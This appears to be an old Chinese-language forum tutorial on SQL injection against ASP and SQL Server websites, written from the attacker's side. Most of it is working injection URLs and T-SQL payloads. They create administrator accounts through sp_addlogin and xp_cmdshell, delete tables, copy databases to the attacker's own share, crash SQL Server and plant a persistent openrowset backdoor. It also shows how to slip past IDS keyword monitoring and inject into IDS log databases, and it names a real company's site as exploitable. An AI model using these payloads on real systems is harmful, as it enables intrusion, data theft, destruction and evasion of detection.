對(duì)于國(guó)內(nèi)外的很多新聞,BBS和電子商務(wù)網(wǎng)站都采用ASP+SQL設(shè)計(jì),而寫 ASP的程序員很多(有很多剛剛畢業(yè)的),所以,ASP+SQL的攻擊成功率也比較高。這類攻擊方法與NT的版本和SQL的版本沒(méi)有多大的關(guān)系,也沒(méi)有相應(yīng)的補(bǔ)丁,因?yàn)槁┒词浅绦騿T自己造成的,而且大多數(shù)講解ASP編 程的書上,源代碼例子就有這個(gè)漏洞存在,其實(shí)只是一些合法的ASP對(duì)SQL的請(qǐng)求,就留下后患無(wú)窮!
這種攻擊方法最早源于'or'1'='1的漏洞(我們暫且稱其為漏洞),這個(gè)漏洞的原理我想大家因該都知道了,那么隨之而來(lái)的便是;exec sp_addlogin hax(在數(shù)據(jù)庫(kù)內(nèi)添加一個(gè)hax用戶),但是這個(gè)方法的限制很大,首先ASP使用的SQL Server賬號(hào)是個(gè)管理員,其次請(qǐng)求的提交變 量在整個(gè)SQL語(yǔ)句的最后,因?yàn)橛幸恍┏绦騿T采用SELECT * FROM news WHERE id=... AND topic=... AND .....
這種方法請(qǐng)求數(shù)據(jù)庫(kù),那么如果還用以上的例子就會(huì)
news.asp?id=2;exec sp_addlogin hax
變成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ...
整個(gè)SQL語(yǔ)句在執(zhí)行sp_addlogin的存儲(chǔ)過(guò)程后有AND與判斷存在,語(yǔ)法錯(cuò)誤,你的sp_addlogin自然也不能正常運(yùn)行了,因此試試看下面這個(gè)方法
news.asp?id=2;exec sp_addlogin hax;--
后面的--符號(hào)把sp_addlogin后的判斷語(yǔ)句變成了注釋,這樣就不會(huì)有語(yǔ)法錯(cuò)誤了,sp_addlogin正常執(zhí)行!
那么我們連一起來(lái)用吧
news.asp?id=2;exec master.dbo.sp_addlogin hax;--
news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';-- 這樣,你在他的數(shù)據(jù)庫(kù)和系統(tǒng)內(nèi)都留下了hax管理員賬號(hào)了
當(dāng)然,前提條件是ASP用管理員賬號(hào),所以虛擬空間大家就別試了,不會(huì)存在這個(gè)漏洞的。
以后我們會(huì)討論,如果對(duì)方的ASP不是用SQL管理員賬號(hào),我們?nèi)绾稳肭郑?dāng)然也會(huì)涉及到1433端口的入侵
當(dāng)然大家可以試試看在id=2后面加上一個(gè)'符號(hào),主要看對(duì)方的ASP怎么寫了
再說(shuō)說(shuō)當(dāng)ASP程序使用的SQL賬號(hào)不是管理員的時(shí)候我們?cè)撊绾巫觥?
假設(shè)有如下頁(yè)面
http://www.xxxxx.com/news/news-2.asp?newid=117
大家可以試試看http://www.xxxxx.com/news/news-2.asp?newid=117;select 123;--
呵呵,報(bào)語(yǔ)法錯(cuò)誤,select 123錯(cuò)誤,顯而易見(jiàn),天融新的ASP在newid變量后面用'號(hào)結(jié)束
那么試試看http://www.xxxxx.com/news/news-2.asp?newid=117';delete news;--
哈哈,我想只要表名猜對(duì)了,新聞庫(kù)就被刪了
通常ASP用的SQL賬號(hào)就算不是管理員也會(huì)是某個(gè)數(shù)據(jù)庫(kù)的owner,至少對(duì)于這個(gè)庫(kù)有很高的管理權(quán)限
但是我們不知道庫(kù)名該怎么?看看db_name()函數(shù)吧
打開(kāi)你的query analyzer,看看print db_name() ,呵呵,當(dāng)前的數(shù)據(jù)庫(kù)名就出來(lái)了
以次類推,如下: declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';--
呵呵,他的當(dāng)前數(shù)據(jù)庫(kù)就備份到你的硬盤上了,接下來(lái)要做的大家心里都明白了吧
同理這個(gè)方法可以找到對(duì)方的SQL的IP
先裝一個(gè)防火墻,打開(kāi)ICMP和139TCP和445TCP的警告提示
然后試試看news.asp?id=2;exec master.dbo.xp_cmdshell 'ping 你的IP'
如果防火墻提示有人ping你,那么因該可以肯定對(duì)方的ASP用的是SQL的管理員權(quán)限,同時(shí)也確定了對(duì)方的SQL Server的準(zhǔn)確位置,因?yàn)楹芏啻?一點(diǎn)的網(wǎng)站考慮性能,會(huì)把web服務(wù)和數(shù)據(jù)庫(kù)分開(kāi),當(dāng)對(duì)方大上了補(bǔ)丁看不到源代碼時(shí),我想只有這個(gè)方法能很快的定位對(duì)方的SQL Server的位置了
那么,如果對(duì)方ASP沒(méi)有SQL管理員權(quán)限,我們就不能調(diào)用xp_cmdshell了,該怎么辦?
別著急,試試看這個(gè)news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';--
呵呵,你的防火墻該發(fā)出警告了,有人連接你的445或139(win9端口了,這樣,對(duì)方的SQL的ip一樣也可以暴露
那么如果對(duì)方連某個(gè)數(shù)據(jù)庫(kù)的owner也不是的話,我們?cè)撛趺崔k?下次我會(huì)告訴大家一個(gè)更好的辦法。
其實(shí)backuo database到你的硬盤還是有點(diǎn)夸張了,如果對(duì)方數(shù)據(jù)庫(kù)很龐大,你又是撥號(hào)上網(wǎng),呵呵,勸你別試了,很難成功傳輸?shù)?
稍后我們還會(huì)談到如何騙過(guò)IDS執(zhí)行ASP+SQL入侵
目前有些好的IDS已經(jīng)開(kāi)始監(jiān)視xp_cmdshell這些關(guān)鍵字了
所有以上url希望大家通過(guò)vbscript提交,因?yàn)闉g覽器的地址欄會(huì)屏蔽一些特殊字符,這樣你的命令就不能完整傳輸了
window.location.herf=URL
補(bǔ)充:這個(gè)問(wèn)題以前載網(wǎng)上也提出來(lái)過(guò),但是只是一些簡(jiǎn)單的xp_cmdshell調(diào)用限制很大,其實(shí)這里面還有很多值得深入的地方比如
www.guosen.com.cn。國(guó)信證卷就有這個(gè)問(wèn)題,而且他們采用ms的三層結(jié)構(gòu)作的用以前說(shuō)的xp_cmdshell做法就不行了,字符串會(huì)被過(guò)濾,但是
我嘗試了,用sql的異類請(qǐng)求仍然可以在對(duì)方的機(jī)器上開(kāi)啟telnet服務(wù)和administrators組的賬號(hào)!由于對(duì)方防火墻很嚴(yán)checkpoint數(shù)據(jù)報(bào)進(jìn)出
都只開(kāi)放80端口,因此,要想獲得他的數(shù)據(jù)庫(kù)結(jié)構(gòu)比較困難了,但是還是有辦法可以做到的:P
順便提醒大家注意一下關(guān)于sqloledb,db_name,openrowset,opendatasource這些系統(tǒng)函數(shù)當(dāng)asp的sqlserver賬號(hào)只是一個(gè)普通用戶時(shí),他們會(huì) 很有用的!
sql server新漏洞和一些突破口
下面我要談到一些sqlserver新的bug,雖然本人經(jīng)過(guò)長(zhǎng)時(shí)間的努力,當(dāng)然也有點(diǎn)幸運(yùn)的成分在內(nèi),才得以發(fā)現(xiàn),不敢一個(gè)人獨(dú)享,拿出來(lái)請(qǐng)大家
鑒別,當(dāng)然很有可能有些高手早已知道了,畢竟我接觸sqlserver的時(shí)間不到1年:P
1。關(guān)于openrowset和opendatasource
可能這個(gè)技巧早有人已經(jīng)會(huì)了,就是利用openrowset發(fā)送本地命令
通常我們的用法是(包括MSDN的列子)如下
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')
可見(jiàn)(即使從字面意義上看)openrowset只是作為一個(gè)快捷的遠(yuǎn)程數(shù)據(jù)庫(kù)訪問(wèn),它必須跟在select后面,也就是說(shuō)需要返回一個(gè)recordset
那么我們能不能利用它調(diào)用xp_cmdshell呢?答案是肯定的!
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')
必須加上set fmtonly off用來(lái)屏蔽默認(rèn)的只返回列信息的設(shè)置,這樣xp_cmdshell返回的output集合就會(huì)提交給前面的select顯示,如果采用默認(rèn)設(shè)置,會(huì)返回空集合導(dǎo)致select出錯(cuò),命令也就無(wú)法執(zhí)行了。
那么如果我們要調(diào)用sp_addlogin呢,他不會(huì)像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonly設(shè)置了,可以如下操作
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin Hectic')
這樣,命令至少會(huì)返回select 'OK!'的集合,你的機(jī)器商會(huì)顯示OK!,同時(shí)對(duì)方的數(shù)據(jù)庫(kù)內(nèi)也會(huì)增加一個(gè)Hectic的賬號(hào),也就是說(shuō),我們利用
select 'OK!'的返回集合欺騙了本地的select請(qǐng)求,是命令能夠正常執(zhí)行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于
這個(gè)方法真正的用處,大家慢慢想吧:P
2。關(guān)于msdasql兩次請(qǐng)求的問(wèn)題
不知道大家有沒(méi)有試過(guò)用msdasql連接遠(yuǎn)程數(shù)據(jù)庫(kù),當(dāng)然這個(gè)api必須是sqlserver的管理員才可以調(diào)用,那么如下
select * from openrowset('msdasql','driver={sql server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from table2')
當(dāng)table1和table2的字段數(shù)目不相同時(shí),你會(huì)發(fā)現(xiàn)對(duì)方的sqlserver崩潰了,連本地連接都會(huì)失敗,而系統(tǒng)資源占用一切正常,用pskill殺死
sqlserver進(jìn)程后,如果不重啟機(jī)器,sqlserver要么無(wú)法正常啟動(dòng),要么時(shí)常出現(xiàn)非法操作,我也只是碰巧找到這個(gè)bug的,具體原因我還沒(méi)有
摸透,而且很奇怪的是這個(gè)現(xiàn)象只出現(xiàn)在msdasql上,sqloledb就沒(méi)有這個(gè)問(wèn)題,看來(lái)問(wèn)題不是在于請(qǐng)求集合數(shù)目和返回集合數(shù)目不匹配上,因
該還是msdasql本身的問(wèn)題,具體原因,大家一起慢慢研究吧:P
3??膳碌暮箝T
以前在網(wǎng)上看到有人說(shuō)在sqlserver上留后門可以通過(guò)添加triger,jobs或改寫sp_addlogin和sp_addsrvrolemember做到,這些方法當(dāng)然可行,
但是很容易會(huì)被發(fā)現(xiàn)。不知道大家有沒(méi)有想過(guò)sqloledb的本地連接映射。呵呵,比如你在對(duì)方的sqlserver上用sqlserver的管理員賬號(hào)執(zhí)行如下的命令
select * from openrowset('sqloledb','trusted_connection=yes;data source=Hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')
這樣在對(duì)方的sqlserver上建立了一個(gè)名為Hectic的本地連接映射,只要sqlserver不重啟,這個(gè)映射會(huì)一直存在下去,至少我現(xiàn)在還不知道如何發(fā)現(xiàn)別人放置的連接映射,好了,以上的命令運(yùn)行過(guò)后,你會(huì)發(fā)現(xiàn)哪怕是sqlserver沒(méi)有任何權(quán)限的guest用戶,運(yùn)行以上這條命令也一樣能通過(guò)!而且權(quán)限是localsystem?。J(rèn)安裝)呵呵!這個(gè)方法可以用來(lái)在以被入侵過(guò)獲得管理員權(quán)限的sqlserver上留下一個(gè)后門了。
以上的方法在sqlserver2000+sqlserver2000SP1上通過(guò)!
*另外還有一個(gè)猜測(cè),不知道大家有沒(méi)有注意過(guò)windows默認(rèn)附帶的兩個(gè)dsn,一個(gè)是localserver一個(gè)是msqi,這兩個(gè)在建立的時(shí)候是本地管理員賬號(hào)連接sqlserver的,如果對(duì)方的sqlserver是通過(guò)自定義的power user啟動(dòng),那么sa的權(quán)限就和power user一樣,很難有所大作為,但是 我們通過(guò)如下的命令
select * from openrowset('msdasql','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\''')應(yīng)該可以利用localserver的管理員賬號(hào)連接本地sqlserver然后再以這個(gè)賬號(hào)的權(quán)限執(zhí)行本地命令了,這是后我想應(yīng)該能突破sa那個(gè)power user權(quán)限了?,F(xiàn)在的問(wèn)題是sqloledb無(wú)法調(diào)用dsn連接,而msdasql非管理員不讓調(diào)用,所以我現(xiàn)在正在尋找guest調(diào)用msdasql的方法,如果有人知道這個(gè)bug如何突破,或有新的想法,我們可以一起討論一下,這個(gè)發(fā)放如果能成功被guest利用,將會(huì)是一個(gè)很嚴(yán)重的安全漏洞。
因?yàn)槲覀兦懊嫣岬降娜魏蝧ql語(yǔ)句都可以提交給對(duì)方的asp去幫我們執(zhí)行
利用t-sql騙過(guò)ids或攻擊ids
現(xiàn)在的ids已經(jīng)變得越來(lái)越聰明了
有的ids加入了xp_cmdshell sp_addlogin 的監(jiān)視 。
但是畢竟人工智能沒(méi)有出現(xiàn)的今天,這種監(jiān)視總是有種騙人的感覺(jué)
先說(shuō)說(shuō)欺騙ids:
ids既然監(jiān)視xp_cmdshell關(guān)鍵字,那么我們可以這么做
declare @a sysname set @a="xp_"+"cmdshell" exec @a 'dir c:\'
這個(gè)代碼相信大家都能看明白,還有xp_cmdshell作為一個(gè)store procedure在master庫(kù)內(nèi)有一個(gè)id號(hào),固定的,我們也可以這么做
假設(shè)這個(gè)id=988456
declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'
當(dāng)然也可以
declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'
這種做法排列組合,ids根本不可能做的到完全監(jiān)視
同理,sp_addlogin也可以這么做
再說(shuō)說(shuō)攻擊ids:
因?yàn)閕ds數(shù)據(jù)量很大,日至通常備份到常規(guī)數(shù)據(jù)庫(kù),比如sql server
如果用古老的recordset.addnew做法,會(huì)嚴(yán)重影響ids的性能,因?yàn)橥ㄟ^(guò)ado做t-sql請(qǐng)求,不但效率高,而且有一部分工作可以交給sql server 去做
通常程序會(huì)這么寫ues ('日至內(nèi)容',...)
那么我么想想看,如果用
temp') exec xp_cmdshell 'dir c:\' --
提交后會(huì)變成
insert table values ('日至內(nèi)容'....'temp') exec xp_cmdshell 'dir c:\' -- ')
這樣,xp_cmdshell就可以在ids的數(shù)據(jù)庫(kù)運(yùn)行了 :)
當(dāng)然ids是一個(gè)嗅嘆器,他會(huì)抓所有的報(bào),而瀏覽器提交的時(shí)候會(huì)把空格變成%20
因此,%20會(huì)被提交到sql server,這樣你的命令就無(wú)法執(zhí)行了
唯一的辦法就是
insert/**/table/**/values('日至內(nèi)容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')
用/**/代替空格做間隔符,這樣你的t-sql才能在ids的數(shù)據(jù)庫(kù)內(nèi)執(zhí)行
當(dāng)然也可以用其他語(yǔ)句,可以破壞,備份ids的數(shù)據(jù)庫(kù)到你的共享目錄
呵呵 ,其實(shí)這種方法的原理和攻擊asp是一樣的,只是把空格變成了/**/ ,本來(lái)asp是select語(yǔ)句,那么用'就可以屏蔽,現(xiàn)在ids用insert語(yǔ)句,那么用')屏蔽
好了,其他很多新的入侵語(yǔ)句大家可以自己慢慢想,最好的測(cè)試工具就是query analyzer了。
